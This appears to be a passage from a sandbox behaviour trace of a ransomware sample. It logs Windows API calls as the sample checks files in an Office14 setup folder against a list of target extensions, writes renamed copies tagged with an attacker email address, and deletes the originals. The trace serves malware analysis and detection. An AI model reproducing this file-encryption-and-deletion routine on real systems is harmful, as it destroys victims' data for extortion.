lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString=".1cd") returned 4 [0040.852] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString=".jpg") returned 4 [0040.852] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString=".doc") returned 4 [0040.852] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".docx") returned 5 [0040.852] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.852] lstrlenW (lpString=".pdf") returned 4 [0040.852] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".xls") returned 4 [0040.852] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".xlsx") returned 5 [0040.852] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.852] lstrlenW (lpString=".ppt") returned 4 [0040.852] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.852] lstrlenW (lpString=".zip") returned 4 [0040.852] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.852] lstrlenW (lpString=".rar") returned 4 [0040.852] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.852] lstrlenW (lpString=".bz2") returned 4 [0040.852] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.853] lstrlenW (lpString=".7z") returned 3 [0040.853] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.853] lstrlenW (lpString=".dbf") returned 4 [0040.853] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.853] lstrlenW (lpString=".1cd") returned 4 [0040.853] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.853] lstrlenW (lpString=".jpg") returned 4 [0040.853] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.853] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.853] lstrlenW (lpString="Proof.XML") returned 9 [0040.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.853] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1458) returned 1 [0040.853] CloseHandle (hObject=0x1ec) returned 1 [0040.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20 [0040.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.857] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.857] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.857] GetLastError () returned 0x0 [0040.857] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5b2, lpOverlapped=0x0) returned 1 [0040.859] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0040.860] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.860] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.860] SetEndOfFile (hFile=0x1f0) returned 1 [0040.860] CloseHandle (hObject=0x1f0) returned 1 [0040.860] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.860] SetEndOfFile (hFile=0x1ec) returned 1 [0040.861] CloseHandle (hObject=0x1ec) returned 1 [0040.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.862] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0040.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.862] lstrlenW (lpString=".doc") returned 4 [0040.862] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString=".docx") returned 5 [0040.862] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.862] lstrlenW (lpString=".pdf") returned 4 [0040.862] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString=".xls") returned 4 [0040.862] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString=".xlsx") returned 5 [0040.862] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.862] lstrlenW (lpString=".ppt") returned 4 [0040.862] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.862] lstrlenW (lpString=".zip") returned 4 [0040.862] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.862] lstrlenW (lpString=".rar") returned 4 [0040.862] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString=".bz2") returned 4 [0040.862] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString=".7z") returned 3 [0040.862] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.862] lstrlenW (lpString=".dbf") returned 4 [0040.862] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.862] lstrlenW (lpString=".1cd") returned 4 [0040.863] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString=".jpg") returned 4 [0040.863] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString=".doc") returned 4 [0040.863] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString=".docx") returned 5 [0040.863] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.863] lstrlenW (lpString=".pdf") returned 4 [0040.863] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString=".xls") returned 4 [0040.863] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString=".xlsx") returned 5 [0040.863] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.863] lstrlenW (lpString=".ppt") returned 4 [0040.863] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString=".zip") returned 4 [0040.863] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.863] lstrlenW (lpString=".rar") returned 4 [0040.863] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString=".bz2") returned 4 [0040.863] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString=".7z") returned 3 [0040.863] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString=".dbf") returned 4 [0040.863] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.863] lstrlenW (lpString=".1cd") returned 4 [0040.863] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0040.864] lstrlenW (lpString=".jpg") returned 4 [0040.864] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.864] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.864] lstrlenW (lpString="Proofing.XML") returned 12 [0040.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.865] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=811) returned 1 [0040.865] CloseHandle (hObject=0x1ec) returned 1 [0040.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20 [0040.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.865] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.865] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.865] GetLastError () returned 0x0 [0040.865] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x32b, lpOverlapped=0x0) returned 1 [0040.867] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x330, lpOverlapped=0x0) returned 1 [0040.868] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.868] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.868] SetEndOfFile (hFile=0x1f0) returned 1 [0040.868] CloseHandle (hObject=0x1f0) returned 1 [0040.869] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.869] SetEndOfFile (hFile=0x1ec) returned 1 [0040.869] CloseHandle (hObject=0x1ec) returned 1 [0040.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.870] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0040.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.870] lstrlenW (lpString=".doc") returned 4 [0040.870] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString=".docx") returned 5 [0040.870] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.870] lstrlenW (lpString=".pdf") returned 4 [0040.870] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString=".xls") returned 4 [0040.870] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString=".xlsx") returned 5 [0040.870] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.870] lstrlenW (lpString=".ppt") returned 4 [0040.870] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.870] lstrlenW (lpString=".zip") returned 4 [0040.870] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.870] lstrlenW (lpString=".rar") returned 4 [0040.870] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString=".bz2") returned 4 [0040.870] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.870] lstrlenW (lpString=".7z") returned 3 [0040.871] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.871] lstrlenW (lpString=".dbf") returned 4 [0040.871] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.871] lstrlenW (lpString=".1cd") returned 4 [0040.871] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.871] lstrlenW (lpString=".jpg") returned 4 [0040.871] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.871] lstrlenW (lpString=".doc") returned 4 [0040.871] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString=".docx") returned 5 [0040.871] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.871] lstrlenW (lpString=".pdf") returned 4 [0040.871] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString=".xls") returned 4 [0040.871] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.871] lstrlenW (lpString=".xlsx") returned 5 [0040.871] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.871] lstrlenW (lpString=".ppt") returned 4 [0040.872] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.872] lstrlenW (lpString=".zip") returned 4 [0040.872] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.872] lstrlenW (lpString=".rar") returned 4 [0040.872] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.872] lstrlenW (lpString=".bz2") returned 4 [0040.872] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.872] lstrlenW (lpString=".7z") returned 3 [0040.872] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.872] lstrlenW (lpString=".dbf") returned 4 [0040.872] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.872] lstrlenW (lpString=".1cd") returned 4 [0040.872] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.872] lstrlenW (lpString=".jpg") returned 4 [0040.872] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.872] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.872] lstrlenW (lpString="SETUP.XML") returned 9 [0040.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.872] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=5884) returned 1 [0040.873] CloseHandle (hObject=0x1ec) returned 1 [0040.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20 [0040.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0040.873] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.873] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0041.083] GetLastError () returned 0x0 [0041.083] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x16fc, lpOverlapped=0x0) returned 1 [0041.085] WriteFile (in: hFile=0x19c, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1700, lpOverlapped=0x0) returned 1 [0041.086] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.086] WriteFile (in: hFile=0x19c, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.086] SetEndOfFile (hFile=0x19c) returned 1 [0041.087] CloseHandle (hObject=0x19c) returned 1 [0041.087] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.087] SetEndOfFile (hFile=0x1ec) returned 1 [0041.088] CloseHandle (hObject=0x1ec) returned 1 [0041.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.088] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.089] lstrlenW (lpString=".doc") returned 4 [0041.089] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString=".docx") returned 5 [0041.089] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.089] lstrlenW (lpString=".pdf") returned 4 [0041.089] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.089] lstrlenW (lpString=".xls") returned 4 [0041.089] 